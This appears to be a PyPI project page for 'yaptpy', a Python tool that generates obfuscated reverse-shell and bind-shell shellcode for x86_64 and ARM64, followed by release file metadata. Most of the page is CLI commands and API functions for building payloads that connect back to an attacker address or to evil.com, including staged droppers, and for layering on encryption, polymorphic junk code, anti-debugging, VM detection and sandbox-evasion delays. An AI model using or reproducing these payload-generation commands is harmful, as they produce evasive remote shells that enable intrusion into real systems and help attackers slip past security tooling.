yaptpy
CLI tool that generates highly obfuscated x86_64/ARM64 reverse shell shellcode with multiple evasion techniques
Architecture Support
- x86_64 (amd64) - Default
- ARM64 (aarch64) - With reverse shell and bind shell support
Install
pip install yaptpy
Usage
from yaptpy import generate_payload
# Generate basic reverse shell shellcode
shellcode = generate_payload(
ip="192.168.1.100",
port=4444,
executable_path="/bin/sh",
junk=True,
anti_emulation=False,
stack_pivot=False,
obfuscate_path=False,
anti_debug=False,
indirect_syscalls=False,
)
CLI
yaptpy --help
Basic reverse shell:
yaptpy --ip 192.168.1.100 --port 4444
ARM64 (aarch64)
# ARM64 reverse shell
yaptpy --arch arm64 --ip 192.168.1.100 --port 4444
# ARM64 bind shell
yaptpy --arch arm64 --bind --port 4444
Obfuscated version with multiple techniques:
yaptpy --ip 192.168.1.100 --port 4444 --junk --obfuscate-path --anti-debug --rle --xor-key 0xAA
Payload Types
Reverse Shell (default)
yaptpy --ip 192.168.1.100 --port 4444
Bind Shell
yaptpy --bind --port 4444 --bind-addr 0.0.0.0
IPv6
yaptpy --ip 2001:db8::1 --port 4444 --ipv6
DNS Resolution
yaptpy --dns --domain evil.com
Evasion Techniques
Encryption
# XOR encryption
yaptpy --ip 192.168.1.100 --port 4444 --xor-key 0xAA
# Rolling XOR encryption
yaptpy --ip 192.168.1.100 --port 4444 --rolling-xor-key 0x42
# AES-256 encryption
yaptpy --ip 192.168.1.100 --port 4444 --aes-key 0123456789abcdef0123456789abcdef
# RC4 encryption
yaptpy --ip 192.168.1.100 --port 4444 --rc4-key deadbeef
Encoding
# Base64 encoding
yaptpy --ip 192.168.1.100 --port 4444 --base64
# Base32 encoding
yaptpy --ip 192.168.1.100 --port 4444 --base32
# RLE encoding
yaptpy --ip 192.168.1.100 --port 4444 --rle
# LZ77 compression
yaptpy --ip 192.168.1.100 --port 4444 --lz77
Obfuscation
# Polymorphic junk code
yaptpy --ip 192.168.1.100 --port 4444 --junk
# Enhanced polymorphic engine
yaptpy --ip 192.168.1.100 --port 4444 --polymorphic
# Obfuscate executable path
yaptpy --ip 192.168.1.100 --port 4444 --obfuscate-path
# Indirect syscalls
yaptpy --ip 192.168.1.100 --port 4444 --indirect-syscalls
# Stack pivot
yaptpy --ip 192.168.1.100 --port 4444 --stack-pivot
Anti-Analysis
# Anti-debugging (ptrace)
yaptpy --ip 192.168.1.100 --port 4444 --anti-debug
# Anti-emulation (rdtsc/cpuid)
yaptpy --ip 192.168.1.100 --port 4444 --anti-emulation
# VM/hypervisor detection
yaptpy --ip 192.168.1.100 --port 4444 --vm-detect
# Parent process check
yaptpy --ip 192.168.1.100 --port 4444 --parent-check
# Sleep evasion (sandbox bypass)
yaptpy --ip 192.168.1.100 --port 4444 --sleep 60
Advanced Payloads
# Egg hunter
yaptpy --egg-hunter --egg deadbeef
# Staged payload (dropper)
yaptpy --ip 192.168.1.100 --port 4444 --staged
API
Payload Generation
generate_payload(...) -> bytes
Generates core reverse shell payload with optional features.
egg_hunter(egg: bytes) -> bytes
Generates egg hunter shellcode.
generate_bind_shell(port: int, bind_addr: str) -> bytes
Generates bind shell shellcode.
generate_ipv6_reverse_shell(ipv6_addr: str, port: int) -> bytes
Generates IPv6 reverse shell shellcode.
generate_dns_resolve(domain: str) -> bytes
Generates DNS resolution payload.
generate_staged_payload(stage1_size: int) -> tuple[bytes, bytes]
Generates staged payload (stage1 and stage2).
Encryption Functions
xor_encrypt(data: bytes, key: int) -> bytes
Encrypts data using simple byte-wise XOR.
rolling_xor_encrypt(data: bytes, key: int) -> bytes
Encrypts data using rolling XOR (key increments).
base64_encode(data: bytes) -> bytes
Encodes data using Base64.
base32_encode(data: bytes) -> bytes
Encodes data using Base32.
aes_encrypt(data: bytes, key: bytes) -> bytes
Encrypts data using AES-CBC.
rc4_encrypt(data: bytes, key: bytes) -> bytes
Encrypts data using RC4 stream cipher.
lz77_encode(data: bytes, window_size: int, min_match: int, max_match: int) -> bytes
Encodes data using LZ77 compression.
lz77_decode(data: bytes) -> bytes
Decodes LZ77 compressed data.
lz77_decoder_stub(original_size: int) -> bytes
Generates LZ77 decompression stub.
Evasion Functions
generate_sleep_evasion(sleep_seconds: int) -> bytes
Generates sleep evasion code for sandbox bypass.
generate_vm_detection() -> bytes
Generates VM/hypervisor detection code.
generate_parent_check() -> bytes
Generates parent process check code.
Obfuscation Functions
substitute_instructions(asm_code: str) -> str
Applies instruction substitution obfuscation.
transposed_code(asm_lines: list[str]) -> list[str]
Applies code transposition obfuscation.
call_preceded_obfuscation(syscall_num: int) -> bytes
Applies call-preceded syscall obfuscation.
syscall_splitting(syscall_num: int) -> bytes
Applies syscall splitting obfuscation.
enhanced_polymorphic_engine(shellcode: bytes, junk_ratio: float) -> bytes
Applies enhanced polymorphic obfuscation to shellcode.
Utility Functions
api_hash(syscall_name: str) -> int
Computes API hash for syscall resolution.
generate_polymorphic_junk() -> bytes
Generates random non-functional assembly instructions.
remove_comments_from_assembly(assembly_code: str) -> str
Removes comments from assembly code.
rle_decoder_stub(original_size: int) -> bytes
Generates RLE decoder stub.
rolling_xor_decoder_stub(original_size: int, start_key: int) -> bytes
Generates rolling XOR decoder stub.
Development
git clone https://github.com/daedalus/yaptpy.git
cd yaptpy
pip install -e ".[test]"
# run tests
pytest
# format
ruff format src/ tests/
# lint
ruff check src/ tests/
# type check
mypy src/
License
MIT
Metadata
Release files for yaptpy 0.1.0
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| yaptpy-0.1.0.tar.gz | 16.2 kB | Details |
Built distribution (wheel)
| File | Interpreter | ABI | Platform | Reset |
|---|---|---|---|---|
| yaptpy-0.1.0-py3-none-any.whl | Python 3 | none | any | Details |
Total release size: 33.2 kB
Release files / yaptpy-0.1.0.tar.gz
| Download URL | yaptpy-0.1.0.tar.gz |
|---|---|
| Size | 16.2 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
d1b350e09a730ff89c05f8e3e007ef3f65e12b4cb6d2327afbac93312899c084
|
|
BLAKE2b-256 checksum How to use checksums |
55fbccd3357bc069871b27c7fe5627e70a7e3f56fe35e858b856fda50482525e
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
Yes |
| Uploaded via |
twine/6.1.0 CPython/3.13.7
|
Provenance
Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.
PyPI Publish Attestation
PyPI verified that this artifact, at this checksum, originated from the publisher listed below.
Signed by GitHub Actions, verified by PyPI on Mar 28, 2026.
Transparency logRelease files / yaptpy-0.1.0-py3-none-any.whl
| Download URL | yaptpy-0.1.0-py3-none-any.whl |
|---|---|
| Size | 17.0 kB |
| Tags | Python 3 |
|
SHA-256 checksum How to use checksums |
a75129dda5129aa947ebfdd0c1e5662137dac16572016de7becf1a38474d73e3
|
|
BLAKE2b-256 checksum How to use checksums |
721c9d683e722fa4b139af5896f95dd4d1f3f3f39d1f451cfea30e12b42772d7
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
Yes |
| Uploaded via |
twine/6.1.0 CPython/3.13.7
|
Provenance
Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.
PyPI Publish Attestation
PyPI verified that this artifact, at this checksum, originated from the publisher listed below.
Signed by GitHub Actions, verified by PyPI on Mar 28, 2026.
Transparency log